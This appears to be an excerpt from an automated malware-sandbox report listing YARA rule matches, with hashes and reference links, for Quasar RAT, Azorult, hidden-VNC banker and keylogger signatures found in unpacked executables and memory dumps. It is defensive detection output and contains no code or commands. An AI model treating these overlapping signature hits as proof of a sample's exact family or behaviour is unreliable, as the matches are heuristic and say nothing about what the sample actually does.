Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
